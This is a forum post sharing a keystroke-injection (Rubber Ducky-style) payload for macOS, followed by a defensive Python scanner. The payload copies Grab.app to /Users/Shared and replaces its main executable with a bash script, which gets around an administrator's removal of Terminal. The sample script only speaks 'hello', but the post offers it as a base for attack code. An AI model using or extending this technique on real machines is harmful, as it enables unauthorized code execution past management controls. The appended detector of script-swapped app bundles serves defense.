3.14159jam Posted May 5, 2017

Here is my new payload to attack a Mac without using terminal. I got this idea after seeing how, using good management software, an administrator can remove an app from a Mac (one such application being terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files and all without terminal.

I used Grab.app for this, but almost any app could be used; I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it.

Here is the code; its outcome is to simply "say hello" (so if you test it, have the volume up a bit). I have not really played with the delays yet; they are all over the place and some are too high, but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have Fun, but please use this responsibly.
DELAY 2000
COMMAND SPACE
DELAY 300
STRING /Applications/Utilities/
DELAY 200
ENTER
DELAY 400
STRING g
DELAY 500
COMMAND c
DELAY 300
COMMAND SPACE
DELAY 300
STRING /Users/Shared/
DELAY 400
ENTER
DELAY 400
COMMAND v
DELAY 2000
COMMAND SPACE
DELAY 300
STRING /Users/Shared/Grab.app/Contents/MacOS/
DELAY 600
ENTER
DELAY 500
TAB
DELAY 500
COMMAND o
DELAY 500
COMMAND a
DELAY 500
STRING #!/bin/bash
DELAY 400
ENTER
DELAY 300
STRING say
DELAY 300
ESCAPE
DELAY 300
SPACE
DELAY 300
STRING hello
DELAY 300
COMMAND s
DELAY 400
COMMAND q
DELAY 500
COMMAND SPACE
DELAY 300
STRING /Users/Shared/Grab.app
DELAY 400
ENTER
COMMAND w
COMMAND w
COMMAND w
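For defenders, the copy this post describes leaves a checkable trace: an .app bundle whose main executable under Contents/MacOS/ starts with `#!` rather than a Mach-O header. The scanner below is an added example, not part of the original post; `make_bundle` and the two sample bundles are constructed for the demonstration, and a real sweep would point `scan()` at a directory such as /Users/Shared.

```python
import plistlib
import tempfile
from pathlib import Path

# Leading bytes of thin and universal Mach-O files, in both byte orders.
MACHO_MAGICS = {bytes.fromhex(h) for h in (
    "feedface", "cefaedfe", "feedfacf", "cffaedfe",
    "cafebabe", "bebafeca", "cafebabf", "bfbafeca")}

def main_executable(bundle: Path) -> Path:
    """File the bundle launches: CFBundleExecutable, else the bundle's name."""
    name = bundle.stem
    try:
        with open(bundle / "Contents" / "Info.plist", "rb") as fh:
            name = plistlib.load(fh).get("CFBundleExecutable") or name
    except Exception:  # missing or unparsable plist: keep the fallback name
        pass
    return bundle / "Contents" / "MacOS" / name

def classify(path: Path) -> str:
    """'macho', 'script', 'other' or 'missing', judged from the first bytes."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(4)
    except OSError:
        return "missing"
    if head in MACHO_MAGICS:
        return "macho"
    return "script" if head.startswith(b"#!") else "other"

def scan(root: Path) -> dict:
    """Verdict for every .app bundle found under root."""
    return {str(b.relative_to(root)): classify(main_executable(b))
            for b in sorted(root.rglob("*.app")) if b.is_dir()}

def make_bundle(root: Path, name: str, exe_bytes: bytes) -> None:
    """Build a constructed sample bundle (not a real application)."""
    macos = root / f"{name}.app" / "Contents" / "MacOS"
    macos.mkdir(parents=True)
    (macos / name).write_bytes(exe_bytes)
    with open(macos.parent / "Info.plist", "wb") as fh:
        plistlib.dump({"CFBundleExecutable": name}, fh)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        make_bundle(Path(tmp), "Native", bytes.fromhex("cffaedfe") + b"\0" * 28)
        make_bundle(Path(tmp), "Swapped", b"#!/bin/bash\nsay hello\n")
        for bundle, verdict in scan(Path(tmp)).items():
            print(f"{verdict:8} {bundle}")
```

A `script` verdict on a bundle in a user-writable location is something to review alongside the bundle's code-signature status, since editing the executable no longer matches what was signed.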